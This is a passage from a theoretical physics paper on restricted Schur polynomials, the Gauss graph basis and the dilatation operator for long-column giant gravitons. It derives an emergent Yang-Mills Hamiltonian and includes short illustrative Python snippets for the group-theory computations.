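# chi_{(2)}(phi) = (1/2!) sum_sigma chi_{(2)}(sigma) Tr(sigma phi ox phi),
# with chi_{(2)}(sigma) = 1 for both elements of S_2 (symmetric representation).
phi = [[1.0, 2.0], [3.0, 4.0]]
schur = 0.5 * sum(multi_trace(s, phi) for s in permutations(range(2)))
```

For a $2\times 2$ matrix this reproduces $\chi_{(2)}(\phi)=\tfrac{1}{2}\big((\operatorname{Tr}\phi)^2+\operatorname{Tr}\phi^2\big)$.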
The restricted Schur polynomials are labeled by representations and multiplicity labels. $R$ denotes an irreducible representation of $S_{n_{T}}$, labeled by a Young diagram with $n_T$ boxes. We have $\vec{r}=(r_1,r_2,r_3)$, where $r_A$ is a Young diagram with $n_A$ boxes, and $n_1+n_2+n_3=n_T$. Together these three Young diagrams label an irreducible representation of $S_{n_1}\times S_{n_2}\times S_{n_3}$, which is a subgroup of $S_{n_{T}}$. The operator must be invariant under swapping identical bosons $\phi_A$. The only way to realize this is to have the row and column indices of the $\phi_A$ fields transform in the same representation $r_A$, and then to project onto the trivial representation, which appears exactly once in $r_A\otimes r_A$. Further, we have $\vec{\mu}=(\mu_2,\mu_3)$ and $\vec{\nu}=(\nu_2,\nu_3)$, where $\mu_A$ and $\nu_A$ specify the multiplicity of $r_A$ as a subspace of the carrier space of $R$. Multiplicities must be introduced at this point because a representation of the subgroup may appear more than once. We remove $n_2$ boxes from $R$ and assemble them into $r_2$. There may be more than one way to do this, and different choices bring us into different copies of the carrier space of $r_2$. We distinguish the different copies using $\mu_2$ (or $\nu_2$). Similarly, removing $n_3$ boxes from $R$ we may find different copies of $r_3$, and we use $\mu_3$ (or $\nu_3$) to distinguish them. Finally, the remaining boxes in $R$ compose the Young diagram labeling $r_1$, so that no multiplicity label is needed for it.
$\chi_{R,(\vec{r})\vec{\mu}\vec{\nu}}(\sigma)$ is a restricted character \cite{2007Giantgravitons}, obtained by summing the row index of $\Gamma^{R}(\sigma)$ over the subspace $(\vec{r})\vec{\mu}$ and the column index over the subspace $(\vec{r})\vec{\nu}$, both of which arise upon restricting the representation $R$ of $S_{n_{T}}$ to its $S_{n_1}\times S_{n_2}\times S_{n_3}$ subgroup, as explained above. It is useful to write
\begin{equation}
\chi_{R,(\vec{r}) \vec{\mu} \vec{\nu}}(\sigma)=\operatorname{Tr}_{R}\left(P_{R,(\vec{r}) \vec{\mu} \vec{\nu}} \Gamma^{(R)}(\sigma)\right)
\end{equation}
The trace is over the carrier space of the irreducible representation $R$. The operator $P_{R,(\vec{r})\vec{\mu}\vec{\nu}}$ is an intertwining map. In the above trace, it restricts the row indices of $\Gamma^{R}(\sigma)$ to the copy of $\vec{r}$ labeled by $\vec{\nu}$ and the column indices to the copy of $\vec{r}$ labeled by $\vec{\mu}$.
For convenience we will use the restricted Schur polynomials normalized to have a unit two point function. The normalized operator $O_{R,(\vec{r})\vec{\mu}\vec{\nu}}\left(\phi\right)$ is defined by
\begin{equation}
\chi_{R,(\vec{r})\vec{\mu}\vec{\nu}}\left(\phi\right)=\sqrt{\frac{f_{R}\text{hooks}_{R}}{\prod_{A}\text{hooks}_{r_A}}}O_{R,(\vec{r})\vec{\mu}\vec{\nu}}\left(\phi\right)
\end{equation}
We will show the action of the dilatation operator on normalized restricted Schur polynomials in what follows. It is useful to introduce the shorthand
\begin{equation}
\begin{array}{ll}
1_{\phi_{1}}=n_2+n_3+1 & n_{\phi_{1}}=n_1+n_2+n_3=n_{T} \\
1_{\phi_{2}}=n_{1}+1 & n_{\phi_{2}}=n_{1}+n_{2} \\
1_{\phi_{3}}=1 & n_{\phi_{3}}=n_{1} \\
\end{array}
\end{equation}
We also abbreviate $1_{\phi_{A}}$ as $1_{A}$. Note that $n_{\phi_A}$ and $n_{A}$ are distinct and should not be confused. The action of the dilatation operator \cite{2020EmergentYangMills} now reads
\begin{equation}
\begin{aligned}
D O_{R(\vec{r})\vec{\mu}\vec{\nu}}=-\frac{2g^2_{YM}}{(4\pi)^2}\sum_{A>B=1}^{3}\sum_{T(\vec{t})\vec{\alpha}\vec{\beta}}(\mathcal{M}_{AB})_{R(\vec{r})\vec{\mu}\vec{\nu},T(\vec{t})\vec{\alpha}\vec{\beta}}O_{T(\vec{t})\vec{\beta}\vec{\alpha}}
\end{aligned}\label{dilone}
\end{equation}
\begin{equation}\label{action on restricted Schur's}
\begin{aligned}
(\mathcal{M}_{AB})_{R(\vec{r})\vec{\mu}\vec{\nu},T(\vec{t})\vec{\alpha}\vec{\beta}}&=\sum_{R',T'}\sqrt{c_{RR'}c_{TT'}}\sqrt{\frac{\text{hooks}_{\vec{r}} \text{hooks}_{\vec{t}}}{\text{hooks}_{R} \text{hooks}_{T}}}\frac{n_A n_B \sqrt{\text{hooks}_{R'} \text{hooks}_{T'}}}{n_1!n_2!n_3!}\\
\times&\text{Tr}_{R}\Big( \left[ \Gamma^R((1,1_A))P_{R(\vec{r})\vec{\mu}\vec{\nu}}\Gamma^R((1,1_A)),\Gamma^R((1,1_B))\right] I_{R'T'} \\
&\times \left[\Gamma^T((1,1_A))P_{T(\vec{t})\vec{\alpha}\vec{\beta}}^{\dagger}\Gamma^T((1,1_A)),\Gamma^T((1,1_B))\right] I_{T'R'}\Big)
\end{aligned}
\end{equation}
where $R'$ and $T'$ are irreducible representations of $S_{n_T-1}$ obtained by removing one box from $R$ and $T$ respectively. $I_{R'T'}$ is an intertwiner from $T'$ to $R'$, i.e. we have $I_{R'T'}=0$ if $R'\neq T'$. One can refer to \cite{2020EmergentYangMills} for a detailed derivation.
The expressions defined by (\ref{dilone}) and (\ref{action on restricted Schur's}) are what will ultimately be used to define the Hamiltonian of the emergent gauge theory. To make the connection we need to study the dilatation operator in a basis that makes the connection to excited brane states most transparent. This basis, known as the Gauss graph basis, is introduced in the next section.
\section{Diagonalization in the Gauss Graph Basis}\label{GGBasis}
In this section we diagonalize the dilatation operator in its $(\vec{r})\vec{\mu}$ indices by moving to the Gauss graph basis. We give a brief introduction to the Gauss graph basis, which involves defining the displaced corners limit at large $N$. Finally, we prove that the conclusions of \cite{2020EmergentYangMills}, obtained in the long rows case, also follow in the long columns case which we are considering here. This is the first new result of this paper.
\subsection{Transforming to Gauss graph basis}
It is useful to begin with a motivation for the Gauss graph basis. We consider operators which have a definite semi-classical limit in the holographically dual theory, which allows us to simplify the large $N$ dynamics. In this paper we consider a system of $p$ giant gravitons, dual to operators labeled by a Young diagram $R$ with $p$ long columns. We call this the long columns case, while the system of operators labeled by Young diagrams with long rows is called the long rows case. The long rows case was discussed in \cite{2020EmergentYangMills}.
We study operators with dimension $\Delta \sim N$, so that there are $\sim N$ boxes in the Young diagram $R$ that labels the operator. To construct these operators, many $\phi_1$ fields and a few $\phi_2,\phi_3$ fields, which play the role of excitations, are used. Precisely, we assume $n_1 \sim N$ and $n_2\sim n_3\sim \sqrt{N}$.
These operators mix with each other only if the Young diagrams labeling them have the same number of rows or columns. It has been argued that the corners on the bottom of the Young diagram $R$ are well separated at large $N$ and weak coupling \cite{2020EmergentYangMills}. This is called the displaced corners limit, which simplifies the action of the symmetric group on boxes at the corners: permutations simply swap the boxes they act on. Noting that irreducible representations of the subgroup are obtained by removing and then reassembling boxes at the corners, this simplification implies new symmetries and conservation laws \cite{2011GiantGravitonOscillators}. The new symmetry is the freedom to swap row or column indices of $\phi_A$ fields that belong to the same column. The new conservation law is that operators mix only if the numbers of boxes removed from each column to obtain the Young diagram $r_A$ are the same. This motivates the notation $\vec{n}_{A}=((n_{A})_{1},(n_{A})_{2},\dots,(n_{A})_{p})$, where $(n_A)_{i}$ tells us how many boxes are removed from the $i$th column of $R$ and then assembled into $r_A$. Using this notation, the group representing the new symmetry is
\begin{equation}
H_{\vec{n}_{A}}=S_{(n_{A})_{1}}\times S_{(n_{A})_{2}}\times\cdots \times S_{(n_{A})_{p}}
\end{equation}
Both row and column indices of $\phi_A$ fields have this symmetry. Thus inequivalent operators constructed from the $\phi_{A}$ fields are specified by elements of the double coset
\begin{equation}
H_{\vec{n}_{A}}\backslash S_{n_{A}} /H_{\vec{n}_{A}}
\end{equation}
Since the above double coset contains the same number of elements as there are triples $(r_A,\mu_A,\nu_A)$, we may organize the $\phi_A$ fields using the elements of this double coset instead of the triples $(r_A,\mu_A,\nu_A)$ \cite{2012Adoublecosetansatz}. The relevant double cosets used to label our operators are
\begin{equation}
\begin{aligned}
&\phi_2 \leftrightarrow \sigma_{2} \in H_{\vec{n}_{2}}\backslash S_{n_{2}} /H_{\vec{n}_{2}}\\
&\phi_3 \leftrightarrow \sigma_{3} \in H_{\vec{n}_{3}}\backslash S_{n_{3}} /H_{\vec{n}_{3}}
\end{aligned}
\end{equation}
where we use $\sigma_A$ to refer to an element of the double coset $H_{\vec{n}_{A}}\backslash S_{n_{A}} /H_{\vec{n}_{A}}$. For convenience we will use the notation $\vec{\sigma}=(\sigma_2,\sigma_{3})$. It is clear that $\vec{\sigma}$ refers to an element of a direct product of two double cosets.
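As a concrete illustration, the elements of such a double coset can be enumerated by brute force for small $n_A$ by reducing each permutation to a canonical representative. This is an illustrative sketch, not the representation theoretic construction used below; for Young subgroups the count agrees with the number of $p\times p$ matrices of non-negative integers with prescribed row and column sums:

```python
from itertools import permutations, product

def compose(p, q):
    """(p o q)(i) = p[q[i]] for permutations stored as tuples."""
    return tuple(p[q[i]] for i in range(len(p)))

def block_subgroup(blocks):
    """All permutations preserving each block, i.e. H = S_{m_1} x S_{m_2} x ..."""
    n = sum(len(b) for b in blocks)
    elements = []
    for parts in product(*(permutations(b) for b in blocks)):
        perm = list(range(n))
        for block, image in zip(blocks, parts):
            for src, dst in zip(block, image):
                perm[src] = dst
        elements.append(tuple(perm))
    return elements

def double_coset_reps(n, blocks):
    """Canonical representatives of H \\ S_n / H, with H the block subgroup."""
    H = block_subgroup(blocks)
    reps = set()
    for g in permutations(range(n)):
        reps.add(min(compose(h1, compose(g, h2)) for h1 in H for h2 in H))
    return sorted(reps)

# Example: n_A = 4 strings distributed as vec{n}_A = (2, 2) over p = 2 branes.
reps = double_coset_reps(4, [(0, 1), (2, 3)])
```

For $n_A=4$ strings distributed as $\vec{n}_A=(2,2)$ over $p=2$ branes this yields three classes, matching the three $2\times 2$ matrices with all row and column sums equal to two.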
The Gauss graph provides a graphical description of $\vec{\sigma}$. A Gauss graph consists of distinguishable nodes and directed edges stretching between nodes. An edge is allowed to return to the node it departs from,
but at each node the numbers of departing and arriving edges must be equal. This constraint follows from the Gauss law of the emergent gauge theory \cite{2005DbranesInYangMills,2012Adoublecosetansatz}. More details of the connection between graphs and elements of a double coset can be found in \cite{2012StringsfromFeynman}. Evidently, permuting the edges departing from a given node, or permuting those arriving at a given node, yields an identical Gauss graph. Thus, inequivalent Gauss graphs are specified by elements of a double coset and serve as a graphical description of them. In our case, a Gauss graph describing $\vec{\sigma}$ has $p$ nodes, corresponding to the columns of the Young diagram $R$. There is one species of edge for each of the $\phi_2$ and $\phi_3$ fields, with the number of edges of each species given by the number of fields, $n_2$ and $n_3$ respectively. For each $\vec{\sigma}$, the corresponding Gauss graph exhibits a definite configuration. An example of a Gauss graph configuration is shown in Figure 1 of \cite{2012Adoublecosetansatz}.
To describe a Gauss graph we let $(n_{A})_{i\rightarrow j}$ denote the number of edges stretching from node $i$ to node $j$, while $(n_{A})_{ij}=(n_{A})_{i\rightarrow j}+(n_{A})_{j\rightarrow i}$ denotes the number of edges connecting node $i$ and node $j$. In particular, we set $(n_{A})_{ii}=(n_{A})_{i\rightarrow i}$.
Following \cite{2020EmergentYangMills} we will transform from the restricted Schur polynomial basis to the Gauss graph basis. Since we are considering the displaced corners limit when $R$ has $p$ long columns, some modification of the discussion of \cite{2020EmergentYangMills} is needed. We will use the group theoretical coefficients
\begin{equation}\label{group theoretical coefficients for long columns}
C^{r_A}_{\mu_{A} \nu_{A}}(\tau)=\left|H_{\vec{n}_A}\right| \sqrt{\frac{d_{r_A}}{n_A !}}\sum_{k,l=1}^{d_{r_A}} \Gamma^{(r_A^T)}_{k l}(\tau) B_{k \mu_{A}}^{r_A \rightarrow 1^{\vec{n}_A}} B_{l \nu_{A}}^{r_A \rightarrow 1^{\vec{n}_A}}
\end{equation}
to transform the labels of $\phi_{A}$ fields, where $\tau$ is an element of $S_{n_{A}}$, $d_{r_{A}}$ is the dimension of $r_{A}$, $\left|H_{\vec{n}_A}\right|$ is the order of $H_{\vec{n}_A}$, and $\Gamma^{(r_A^T)}_{k l}(\tau)$ is the matrix representing $\tau$ in the representation $r_A^T$, which is the conjugate representation of $r_A$. $B_{k \mu_{A}}^{r_A \rightarrow 1^{\vec{n}_A}}$ is a branching coefficient, defined by
\begin{equation}
\sum_{\mu_A} B_{k \mu_{A}}^{r_A \rightarrow 1^{\vec{n}_A}} B_{l \mu_{A}}^{r_A \rightarrow 1^{\vec{n}_A}}=\frac{1}{|H_{\vec{n}_{A}}|}\sum_{\gamma\in H_{\vec{n}_{A}}}\Gamma^{(r_A^T)}_{kl}(\gamma)
\end{equation}
where $1^{\vec{n}_A}$ denotes the one dimensional sign representation of $H_{\vec{n}_A}$, which might appear more than once in $r_A$. $\mu_A$ labels these multiple copies, so that $\mu_A$ runs from 1 to the number of copies of $1^{\vec{n}_A}$ in $r_A$.
One might be concerned that $\mu_A$ has already been used to specify the multiplicity of $r_A$ as a subspace of the carrier space of $R$. We use this notation on purpose since it has been proved in \cite{2012Adoublecosetansatz} that the number of copies of $r_A$ in $R$ is equal to that of $1^{\vec{n}_A}$ in $r_A$, if we remove $(n_A)_{i}$ boxes from the $i$th column of $R$ to obtain $r_A$.
Using these coefficients, we define the Gauss graph operators by
\begin{equation}\label{basis transformation}
O_{R,r_1}(\vec{\sigma})=\sum_{r_2\vdash n_2}\sum_{r_3\vdash n_3}\sum_{\vec{\mu},\vec{\nu}}C^{r_2}_{\mu_{2} \nu_{2}}(\sigma_2)C^{r_3}_{\mu_{3} \nu_{3}}(\sigma_3)O_{R,(\vec{r})\vec{\mu}\vec{\nu}}
\end{equation}
Thus, a Gauss graph operator is labeled by two Young diagrams, $R$ and $r_1$, together with a Gauss graph which, as discussed above, describes an element $\vec{\sigma}$ of a direct product of two double cosets. To obtain a unit two point function, we define the normalized operator $\hat{O}_{R,r_1}(\vec{\sigma})$ by
\begin{equation}
O_{R,r_1}(\vec{\sigma})=\sqrt{\prod_{A=2}^{3}\prod_{i,j=1}^{p}(n_A)_{i\rightarrow j}!}\hat{O}_{R,r_1}(\vec{\sigma})
\end{equation}
We now turn to the action of the dilatation operator in the Gauss graph basis. To obtain it we need to evaluate
\begin{equation}\label{transform to Gauss graph basis}
(M_{AB})_{R,r_1,\vec{\sigma}; T,t_1,\vec{\tau}} =
\sum_{\substack{
r_2,r_3,\vec{\mu},\vec{\nu}\\
t_2,t_3,\vec{\alpha},\vec{\beta}}}
C^{(r_2,r_3)}_{\vec{\mu}\vec{\nu}}(\vec{\sigma}) C^{(t_2,t_3)}_{\vec{\alpha}\vec{\beta}}(\vec{\tau})(\mathcal{M}_{AB})_{R(\vec{r})\vec{\mu}\vec{\nu},T(\vec{t})\vec{\alpha}\vec{\beta}}
\end{equation}
where
\begin{equation}
C^{(r_2,r_3)}_{\vec{\mu}\vec{\nu}}(\vec{\sigma})=C^{r_2}_{\mu_{2} \nu_{2}}(\sigma_2)C^{r_3}_{\mu_{3} \nu_{3}}(\sigma_3)
\end{equation}
The detailed calculation is given in \cite{2020EmergentYangMills}. Our case is almost identical so we will simply quote the result
\begin{equation}\label{D31,D21 in Gauss graph basis}
\begin{aligned}
&D_{31}O_{R,r_1}(\vec{\sigma})=\sum_{i>j=1}^{p}(n_3)_{ij}\Delta_{ij}O_{R,r_1}(\vec{\sigma})\\
&D_{21}O_{R,r_1}(\vec{\sigma})=\sum_{i>j=1}^{p}(n_2)_{ij}\Delta_{ij}O_{R,r_1}(\vec{\sigma})\\
\end{aligned}
\end{equation}
where the operator $\Delta_{ij}$ acts only on the $R,r_1$ labels and $\Delta_{ij}=\Delta^{0}_{ij}+\Delta^{+}_{ij}+\Delta^{-}_{ij}$. Denote the length of the $i$th column of the Young diagram $r$ by $l_{r_i}$. The Young diagram $r^{+}_{ij}$ is obtained by removing a box from column $j$ and adding it to column $i$, while $r^{-}_{ij}$ is obtained by removing a box from column $i$ and adding it to column $j$.
Using this notation we can write the action of $\Delta^{0}_{ij}$ and $\Delta^{\pm}_{ij}$ as
\begin{equation}
\begin{aligned}
&\Delta^{0}_{ij}O_{R,r}(\vec{\sigma})=-(2N-l_{r_i}-l_{r_j})O_{R,r}(\vec{\sigma})\\
&\Delta^{\pm}_{ij}O_{R,r}(\vec{\sigma})=\sqrt{(N-l_{r_i})(N-l_{r_j})}O_{R^{\pm}_{ij},r^{\pm}_{ij}}(\vec{\sigma})\\
\end{aligned}
\end{equation}
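These formulas are simple enough to check numerically. In the sketch below a state is a dictionary mapping tuples of column lengths to coefficients; for brevity only the $r$ label is tracked (taking $R$ and $r$ to move together) and no check is made that the shifted column lengths still form a valid Young diagram:

```python
from math import sqrt

def apply_delta(i, j, state, N):
    """Apply Delta_ij = Delta0_ij + Delta+_ij + Delta-_ij to a state given
    as {column_lengths: coefficient}; columns are 0-indexed."""
    out = {}
    def add(cols, coeff):
        out[cols] = out.get(cols, 0.0) + coeff
    for cols, c in state.items():
        li, lj = cols[i], cols[j]
        # Delta0: the diagonal piece -(2N - l_i - l_j).
        add(cols, -c * (2 * N - li - lj))
        # Delta+ / Delta-: move one box between columns i and j, with
        # coefficient sqrt((N - l_i)(N - l_j)) read off from the parent r.
        hop = c * sqrt((N - li) * (N - lj))
        plus = list(cols); plus[i] += 1; plus[j] -= 1
        add(tuple(plus), hop)
        minus = list(cols); minus[i] -= 1; minus[j] += 1
        add(tuple(minus), hop)
    return out
```

For example, acting on $r$ with column lengths $(3,2)$ at $N=10$ gives the diagonal coefficient $-(2N-5)=-15$ and hopping coefficients $\sqrt{7\cdot 8}$.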
The action of $D_{32}$, which is described by matrix $M_{32}$, is more complicated. It is given by
\begin{equation}\label{M32 in Gauss graph basis}
\begin{aligned}
&\left(M_{3 2}\right)_{R, r_{1}, \vec{\sigma}; T, t_{1}, \vec{\tau}}= \sum_{R^{\prime}_{i},T'_{j}} \frac{\delta_{r_{1} t_{1}} \delta_{R_{i}^{\prime} T_{j}^{\prime}}}{\sqrt{\left|O_{R, r_{1}}\left(\vec{\sigma}\right)\right|^{2}\left|O_{T, t_{1}}\left(\vec{\tau}\right)\right|^{2}}} \sqrt{\frac{c_{R R_{i}^{\prime}} c_{T T_{j}^{\prime}}}{l_{R_{i}} l_{T_{j}}}} \\
&\times\left[ 2\delta_{ik}(n_3)_{i}(n_2)_{i}-\left( (n_3)_{ki}(n_2)_{ii}+(n_{3})_{ii}(n_2)_{ik} \right) \right]\sum_{\gamma_1,\gamma_2\in H_2}\delta(\vec{\sigma}^{-1}\gamma_1\vec{\tau}\gamma_2)
\end{aligned}
\end{equation}
where $R'_{i}$ denotes the Young diagram produced by removing one box from the $i$th column of $R$, and $c_{R R_{i}^{\prime}}$ is the factor of the removed box. We assume that $t_A$ is obtained by removing $(n'_A)_i$ boxes from the $i$th column of $T$, and $H_2=H_{\vec{n}'_3}\times H_{\vec{n}_2}$.
The norm of a Gauss graph operator is
\begin{equation}
\left| O_{R,r}(\vec{\sigma}) \right|^2=\prod_{i,j=1}^{p}\left(n_{2}^{\vec{\sigma}}\right)_{i\rightarrow j}!\left(n_{3}^{\vec{\sigma}}\right)_{i\rightarrow j}!
\end{equation}
where the superscript $\vec{\sigma}$ on $n_A$ indicates that it counts edges in the Gauss graph describing $\vec{\sigma}$. In this paper, we focus on the matrix $M_{32}$, which describes the interaction between excitations.
\subsection{Long Columns}
Our discussion has frequently used results obtained in \cite{2020EmergentYangMills}, where the displaced corners limit was discussed for restricted Schur polynomials with long rows. The same conclusions follow in the long column case, as we explain in this section.
Firstly, we argue that the action of the dilatation operator on restricted Schur polynomials, $(\mathcal{M}_{AB})_{R(\vec{r})\vec{\mu}\vec{\nu},T(\vec{t})\vec{\alpha}\vec{\beta}}$, in the long column case has the same form as that in the long row case.
In the displaced corners limit, swapping boxes in the same column yields a minus sign. Thus, $\Gamma^R((1,1_A))$ should be identified with $\text{sgn}((1,1_A))(1,1_A)=-(1,1_A)$, while $\Gamma^R((1,1_B))$ should be identified with $-(1,1_B)$. In equation (\ref{action on restricted Schur's}) we find four $\Gamma^R((1,1_A))$ and two $\Gamma^R((1,1_B))$, which gives rise to $(-1)^6=1$. Thus, this action is identical in both cases of the displaced corners limit.
Next, we show that the action of the dilatation operator on Gauss graph operators, $(M_{AB})_{R,r_1,\vec{\sigma}; T,t_1,\vec{\tau}}$, is also identical in both cases.
Note that we obtain this action by using group theoretical coefficients $C^{r_A}_{\mu_A \nu_A}$ to perform the transformation shown in equation (\ref{transform to Gauss graph basis}). The coefficient used in the long row case reads
\begin{equation}
\widetilde{C}^{r_A}_{\mu_{A} \nu_{A}}(\tau)=\left|H_{\vec{n}_A}\right| \sqrt{\frac{d_{r_A}}{n_A !}}\sum_{k,l=1}^{d_{r_A}} \Gamma^{(r_A)}_{k l}(\tau) B_{k \mu_{A}}^{r_A \rightarrow 1_{H_{\vec{n}_A}}} B_{l \nu_{A}}^{r_A \rightarrow 1_{H_{\vec{n}_A}}}
\end{equation}
where $1_{H_{\vec{n}_A}}$ denotes the trivial representation of $H_{\vec{n}_A}$ as a subspace of $r_A$. The tilde, as in $\widetilde{C}^{r_A}_{\mu_{A} \nu_{A}}(\tau)$, distinguishes this coefficient from the coefficient (\ref{group theoretical coefficients for long columns}) used in the long column case. The equality
\begin{equation}\label{equality about branching coefficients}
\sum_{\mu}B_{i\mu}^{r\rightarrow 1^{\vec{m}}} B_{j\mu}^{r\rightarrow 1^{\vec{m}}}=\sum_{\mu}B_{i\mu}^{r^T\rightarrow 1_{H_{\vec{m}}}} B_{j\mu}^{r^T\rightarrow 1_{H_{\vec{m}}}}=\frac{1}{|H_{\vec{m}}|}\sum_{\gamma\in H_{\vec{m}}}\Gamma_{ij}^{(r^T)}(\gamma)
\end{equation}
is useful in what follows. In the detailed calculation of the basis transformation, the branching coefficients always appear summed in this way. Clearly, if we replace $C^{r_A}_{\mu_{A} \nu_{A}}(\tau)$ with $\widetilde{C}^{r_A}_{\mu_{A} \nu_{A}}(\tau)$ and $\sum_{r_A\vdash n_A}$ with $\sum_{r_A^T\vdash n_A}$ in the transformation (\ref{transform to Gauss graph basis}), the final result is unchanged, thanks to the equality (\ref{equality about branching coefficients}). This proves that the action of the dilatation operator in the Gauss graph basis given in the last section is also the correct result in the long column case.
\section{Emergent Yang-Mills Theory: at The Leading Order}\label{emergentYM}
In this section we interpret the action of the dilatation operator at leading order, arguing that it gives the dynamics of a Yang-Mills theory. We first identify the action shown in equations (\ref{D31,D21 in Gauss graph basis}) and (\ref{M32 in Gauss graph basis}) with a Hamiltonian describing the dynamics of states written in an occupation number representation, with each state corresponding to a Gauss graph. This Hamiltonian is then recognized as the Hamiltonian of the worldvolume dynamics of giant graviton branes, which is a super Yang-Mills theory.
\subsection{Emergent Hamiltonian}
The action of the dilatation operator $D_{32}$ on Gauss graph operators, given by equation (\ref{M32 in Gauss graph basis}), can naturally be identified with a Hamiltonian of oscillators. Evidently $D_{32}$ acts only on the Gauss graph labels, so that operators do not mix if their $R,r_1$ labels differ. Further, the configuration of the Gauss graph can be interpreted as an occupation number representation of the state, by identifying an oriented edge for a $\phi_A$ field stretching from the $i$th node to the $j$th node with a particle created by the creation operator $(\bar{b}_A)_{ij}$. With these states, it is possible to rewrite $D_{32}$ in terms of creation and annihilation operators, which come in two categories, one for each type of field.
We perform this rewriting next. Introduce oscillators $(\bar{b}_2)_{ij},(b_2)_{ij}$ for the $\phi_2$ field, as well as oscillators $(\bar{b}_3)_{ij},(b_3)_{ij}$ for the $\phi_3$ field. The oscillator algebra reads
\begin{equation}
[(b_A)_{ij},(\bar{b}_B)_{kl}]=\delta_{AB}\delta_{il}\delta_{jk}; \quad [(b_A)_{ij},(b_B)_{kl}]=[(\bar{b}_A)_{ij},(\bar{b}_B)_{kl}]=0
\end{equation}
where $A,B=2,3$. We can also define the number operators by
\begin{equation}
(\hat{n}_A)_{i\rightarrow j}=(\bar{b}_A)_{ij}(b_A)_{ji}
\end{equation}
it is convenient to introduce $(\hat{n}_A)_{ij}=(\hat{n}_A)_{ji}=(\hat{n}_A)_{i\rightarrow j}+(\hat{n}_A)_{j\rightarrow i}$ (in particular, $(\hat{n}_A)_{ii}=(\hat{n}_A)_{i\rightarrow i}$), and
\begin{equation}
(\hat{n}_A)_{i}=\sum_{j=1}^p (\hat{n}_A)_{ij}=\sum_{j=1}^{p} (\hat{n}_A)_{ji}.
\end{equation}
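As a consistency check of the algebra above (our own sketch, not part of the derivation), the oscillators and number operators can be realized on occupation-number states in a few lines of Python; the mode labels $(A,i,j)$ and the function names are ours.

```python
from collections import defaultdict

# A state is a dict {occupation configuration: amplitude}, where a
# configuration is a frozenset of ((A, i, j), count) pairs and the mode
# (A, i, j) holds quanta created by (bbar_A)_{ij}.

def create(state, A, i, j):
    """Apply (bbar_A)_{ij}, with the standard sqrt(n+1) factor."""
    out = defaultdict(float)
    for occ, amp in state.items():
        d = dict(occ)
        n = d.get((A, i, j), 0)
        d[(A, i, j)] = n + 1
        out[frozenset(d.items())] += amp * (n + 1) ** 0.5
    return dict(out)

def annihilate(state, A, i, j):
    """Apply (b_A)_{ij}; by the algebra above it lowers the mode (A, j, i)."""
    out = defaultdict(float)
    for occ, amp in state.items():
        d = dict(occ)
        n = d.get((A, j, i), 0)
        if n == 0:
            continue                     # (b_A)_{ij} kills this piece
        if n == 1:
            del d[(A, j, i)]
        else:
            d[(A, j, i)] = n - 1
        out[frozenset(d.items())] += amp * n ** 0.5
    return dict(out)

def number(state, A, i, j):
    """(n_A)_{i -> j} = (bbar_A)_{ij} (b_A)_{ji}."""
    return create(annihilate(state, A, j, i), A, i, j)

vac = {frozenset(): 1.0}
# Two phi_3 quanta on the oriented edge 1 -> 2:
s = create(create(vac, 3, 1, 2), 3, 1, 2)
ns = number(s, 3, 1, 2)   # equals 2 * s: the edge carries two quanta
```

One can also check the commutator directly: acting with $(b_3)_{21}(\bar b_3)_{12}-(\bar b_3)_{12}(b_3)_{21}$ on the vacuum returns the vacuum, as the algebra requires.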
A state corresponding to the Gauss graph operator $O_{R,r}(\vec{\sigma})$ is given by
\begin{equation}
O_{R,r}(\vec{\sigma}) \leftrightarrow \prod_{i,j=1}^{p} (\bar{b}_2)_{ij}^{(n_2^{\vec{\sigma}})_{i\rightarrow j}}(\bar{b}_3)_{ij}^{(n_3^{\vec{\sigma}})_{i\rightarrow j}}\ket{0}
\end{equation}
where the vacuum state $\ket{0}$ obeys $(b_{A})_{ij}\ket{0}=0$ for any $A=2,3$ and $i,j=1,2,\dots,p$. The $R,r_1$ labels seem to be missing on the RHS but, as discussed above, the dynamics between states with the same $R,r_1$ labels completely describes the action of $D_{32}$, so we can drop them to simplify the discussion. With this identification, the action of $D_{32}$ can be rewritten as\cite{2020EmergentYangMills}
\begin{equation}
\begin{aligned}
H_{32}=\sum_{i,j=1}^{p}&\sqrt{\frac{(N-l_{r_i})(N-l_{r_j})}{l_{r_i} l_{r_j}}}\\
&\times\Big( -(\hat{n}_3)_{ji}(\bar{b}_2)_{jj}(b_2)_{ii}-(\hat{n}_2)_{ji}(\bar{b}_3)_{jj}(b_3)_{ii}+2\delta_{ij}(\hat{n}_{3})_{i}(\hat{n}_{2})_{i} \Big)
\end{aligned}
\end{equation}
Note that only the closed loops at the nodes of the Gauss graph are dynamical---they are the only objects that are annihilated or created.
Similarly, we can simplify the action of $D_{31}$ and $D_{21}$, shown in equation (\ref{D31,D21 in Gauss graph basis}), at large $N$ and further identify them with terms $H_{31}$ and $H_{21}$ in the Hamiltonian. These terms describe the interaction between the states introduced above. At large $N$, we identify $O_{R_{ij}^{\pm},r_{ij}^{\pm}}(\vec{\sigma})$ with $O_{R,r}(\vec{\sigma})$ so that the $R,r_1$ labels are again not needed to describe these terms. After simplification, the action of $D_{31}$ and $D_{21}$ can be rewritten as
\begin{equation}
\begin{aligned}
&H_{31}=-\sum_{i,j=1}^{p}\left(\sqrt{N-l_{r_i}}-\sqrt{N-l_{r_j}}\right)^2(\hat{n}_3)_{i\rightarrow j}\\
&H_{21}=-\sum_{i,j=1}^{p}\left(\sqrt{N-l_{r_i}}-\sqrt{N-l_{r_j}}\right)^2(\hat{n}_2)_{i\rightarrow j}\\
\end{aligned}
\end{equation}
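$H_{31}$ and $H_{21}$ assign to each edge $i\rightarrow j$ the coefficient $(\sqrt{N-l_{r_i}}-\sqrt{N-l_{r_j}})^2$, which plays the role of a mass squared for the open string stretched between branes $i$ and $j$: it vanishes for coincident branes and grows with their separation. A quick numerical illustration (the values of $N$ and $l_{r_i}$ below are purely illustrative):

```python
import math

def mass_sq(N, l_i, l_j):
    """Coefficient of -(n_A)_{i->j} in H_31 and H_21: the mass squared
    of an open string stretched between branes i and j."""
    return (math.sqrt(N - l_i) - math.sqrt(N - l_j)) ** 2

N = 10_000                       # illustrative values only
print(mass_sq(N, 5000, 5000))    # coincident branes: massless string
print(mass_sq(N, 5000, 5100))    # small separation: light string
print(mass_sq(N, 5000, 8000))    # larger separation: heavier string
```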
The complete Hamiltonian, identified with the action of the dilatation operator, is $H=H_{32}+H_{31}+H_{21}$. We will soon see that this Hamiltonian describes the dynamics of a Yang-Mills theory.
\subsection{Identification with a Yang-Mills Theory}
